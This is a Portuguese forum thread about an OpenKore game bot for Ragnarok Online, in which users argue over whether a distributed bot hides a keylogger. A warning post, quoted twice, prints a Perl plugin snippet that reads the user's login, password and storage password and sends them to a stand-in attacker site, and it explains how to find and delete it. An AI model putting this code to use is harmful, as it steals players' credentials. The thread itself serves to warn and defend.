Ir para conteúdo
Faça parte da equipe! (2024) ×

patched OpenKore Oficial WebCheats


Posts Recomendados

Saru ... cade a atualização da semana ... ta tendo problema ... posta ai ... não abandona a galera ... sei que tem gente reclamando mas esse é um risco que todos que usam bots tem que correr principalmente se o cara nao sabe usar e faz besteira usando na conta principal com equips bons e tudo mais ... aguardando atualização da semana ancioso para ganhar uns zenys .... :timido:

 

Merce:tong:

Link para o comentário
Compartilhar em outros sites

  • Velha Guarda
cara quando abro a pasta Poseidon o arquivo poseidon.pl e abro ele aparece o bloco de notas '-'

 

Você não deve ter instalado o Perl corretamente ou você ainda não reiniciou o computador após a instalação (e acho que isso é necessário).

Link para o comentário
Compartilhar em outros sites

Galera Muitos ai que falaram Bem feito tomou hack por que foi tonto, Legal Fui tonto mais eu Avisei a galera ai que o cara Ta Hackeando geral. E descobri como depois de quase 2 semanas.

Direto ao assunto, detectando keyloggers em bots.

Vale lembrar que se usarem apenas os bots fornecidos pelo brocenter, jamais terão este problema, não sendo necessário verificar se há Keylogger ou não.

 

O que é um keylogger? É um "programa" simples, desenvolvido com o propósito de capturar o que digitou e enviar para aquele que desenvolveu ( ou configurou ). Hoje em dia há diversas maneiras de acabar sendo vítima de um ''programinha'' desses: Desde um clique em um simples executável até uma invasão bem elaborada. E a melhor forma de evitar executáveis como estes é utilizar um bom antivirus, caso não tenha, utilize este site: http://www.virustotal.com

 

Como detectar um keylogger "indetectável", já se tratando de bots?

Os keyloggers usados em bots são dividos muitas vezes em 3 partes, sendo elas:

 

1. Plugin em .pl que vem com o bot.

2. Arquivo .php que fica localizado no site do "hacker/cracker ( na verdade é lammer )".

3. Arquivo .txt que fica também no site do atacante.

 

Tudo isso funciona da seguinte maneira:

Ao rodar o bot, o plugin com código malicioso é executado, ele pega suas informações como: Login, senha e senha de armazém, salva em algumas variáveis e envia para o site do atacante.

O arquivo .php escreve todas essas informações no .txt, e assim o atacante pega suas informações.

 

Para detectar esse código malicioso em .pl ( perls ), vá na pasta de seu openkore e em seguida entre na pasta plugins, lá como já sabem, estão seus plugins.

Abra um por um, aperte CTRL+F e procure por este código:

 

Arquivo.pl

Código: Selecionar todos

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://www.atacante.com/key_strokes.php?keylog=$usuario $senha $kafra")

 

Se por acaso encontrar este código, significa que o bot tem "keylogger", e certamente se executa-lo todas as suas informações serão enviadas para o site do atacante. Para remover o keylogger, apenas apague essas linhas.

 

 

Apos Isso eu fui E fiz o mesmo nos meus bot e rebaixei de um site confiavel para verificar se havia keyloger no bot do outro site tbm. no bot do Brocenter nao encontrei keylogger. somente no bot postado pelo seu kerido amigo Saru... essa pessoa sem carater... Sei que provavelmente serei banido e meu topico removido por Avisar vcs e por falar de um outro forum, do qual é totalmente confiavel... mais nao custa tentar alertar vcs. para que nao deem mais itens pro saru... Obrigado pela atenção e espero que os moderadores desse forum nao permita mais que o saru continue Com esse topico e nem que ele abra outro...

 

 

Sem mais.

Kuarlito

Grato pela atenção de todos.

Link para o comentário
Compartilhar em outros sites

Já que o Saru não atualiza e os últimos comentários falam de hack, concluo que realmente tinha keylogger no bot dele. Felizmente pra mim, ele só colocou isso nas versões mais recentes (porque tenho itens bons mas nunca perdi nada das minhas contas), depois de todo mundo confiar nele (inclusive eu). Fiquei 1 ano sem jogar e por isso não atualizava meu kore, o que foi ótimo pois me livrei de ser roubado.

 

Vou achar um kore confiável em outro lugar.

Link para o comentário
Compartilhar em outros sites

Galera Muitos ai que falaram Bem feito tomou hack por que foi tonto, Legal Fui tonto mais eu Avisei a galera ai que o cara Ta Hackeando geral. E descobri como depois de quase 2 semanas.

Direto ao assunto, detectando keyloggers em bots.

Vale lembrar que se usarem apenas os bots fornecidos pelo brocenter, jamais terão este problema, não sendo necessário verificar se há Keylogger ou não.

 

O que é um keylogger? É um "programa" simples, desenvolvido com o propósito de capturar o que digitou e enviar para aquele que desenvolveu ( ou configurou ). Hoje em dia há diversas maneiras de acabar sendo vítima de um ''programinha'' desses: Desde um clique em um simples executável até uma invasão bem elaborada. E a melhor forma de evitar executáveis como estes é utilizar um bom antivirus, caso não tenha, utilize este site: http://www.virustotal.com

 

Como detectar um keylogger "indetectável", já se tratando de bots?

Os keyloggers usados em bots são dividos muitas vezes em 3 partes, sendo elas:

 

1. Plugin em .pl que vem com o bot.

2. Arquivo .php que fica localizado no site do "hacker/cracker ( na verdade é lammer )".

3. Arquivo .txt que fica também no site do atacante.

 

Tudo isso funciona da seguinte maneira:

Ao rodar o bot, o plugin com código malicioso é executado, ele pega suas informações como: Login, senha e senha de armazém, salva em algumas variáveis e envia para o site do atacante.

O arquivo .php escreve todas essas informações no .txt, e assim o atacante pega suas informações.

 

Para detectar esse código malicioso em .pl ( perls ), vá na pasta de seu openkore e em seguida entre na pasta plugins, lá como já sabem, estão seus plugins.

Abra um por um, aperte CTRL+F e procure por este código:

 

Arquivo.pl

Código: Selecionar todos

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://www.atacante.com/key_strokes.php?keylog=$usuario $senha $kafra")

 

Se por acaso encontrar este código, significa que o bot tem "keylogger", e certamente se executa-lo todas as suas informações serão enviadas para o site do atacante. Para remover o keylogger, apenas apague essas linhas.

 

 

Apos Isso eu fui E fiz o mesmo nos meus bot e rebaixei de um site confiavel para verificar se havia keyloger no bot do outro site tbm. no bot do Brocenter nao encontrei keylogger. somente no bot postado pelo seu kerido amigo Saru... essa pessoa sem carater... Sei que provavelmente serei banido e meu topico removido por Avisar vcs e por falar de um outro forum, do qual é totalmente confiavel... mais nao custa tentar alertar vcs. para que nao deem mais itens pro saru... Obrigado pela atenção e espero que os moderadores desse forum nao permita mais que o saru continue Com esse topico e nem que ele abra outro...

 

 

Sem mais.

Kuarlito

Grato pela atenção de todos.

 

Bom, se tem kl no kore que você flw que baixou daqui. Diga onde ele se encontra?

E prove o que está falando. Este metodo que você postou e tão antigo que e muito, mas muito dificil alguém ainda cair nele.

Meu caro, vá caçar o que fazer. Aqui não tem espaço para pessoas que ficam de mimi....

 

Já que o Saru não atualiza e os últimos comentários falam de hack, concluo que realmente tinha keylogger no bot dele. Felizmente pra mim, ele só colocou isso nas versões mais recentes (porque tenho itens bons mas nunca perdi nada das minhas contas), depois de todo mundo confiar nele (inclusive eu). Fiquei 1 ano sem jogar e por isso não atualizava meu kore, o que foi ótimo pois me livrei de ser roubado.

 

Vou achar um kore confiável em outro lugar.

 

Se não disponibilizei uma atualização e nem respondi o tópico assas duas ultimas semanas, foi por que não tive tempo de fazer isso. Mas a partir da próxima atualização eu estarei fazendo a atualização semanal novamente!

E sobre essas pessoas que falaram que eu estava dando hack em geral, so digo uma coisa. Eles não sabem o que estão falando, ficam baixando de qualquer lugar e depois são hackeados e vem falar que foi eu quem hackeou eles....

Lamentável mas fazer o que né?

Este tópico existe a mais de um ano e desde o inicio sempre teve esse tipo de pessoa falando merda e sem nunca provar nada. Então acredite nessas baboseiras que estão falando se quiser!

Link para o comentário
Compartilhar em outros sites

Bom, lendo todo esse rolo eu fiquei com um pé atras, saru, não me leve à mal mas são anos de investimento.

Eu gostaria que alguem da staff Postasse algo à respeito dessas acusações.

 

grato pela atenção, e novamente saru. Me desculpe.

 

Você tem todo o direito, mas se vier alguém aqui da staff vai falar a mesma coisa que eu falei, aliais eu sou o único membro que tem autorização da moderação para poder fazer postagem do openkore aqui no fórum já que a postagem do mesmo está proibida para os demais membros. Mas você quem sabe, e de se contar nos dedos quantos membros vieram ficar de mimi aqui falando que eu estava dando hacker nas pessoas, mas esses mesmos membros jamais provaram a existência desse keylogger que tanto falam.

 

Enfim, fique a vontade e baixe se quiser, pois eu mesmo não obrigo ninguém a baixar.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.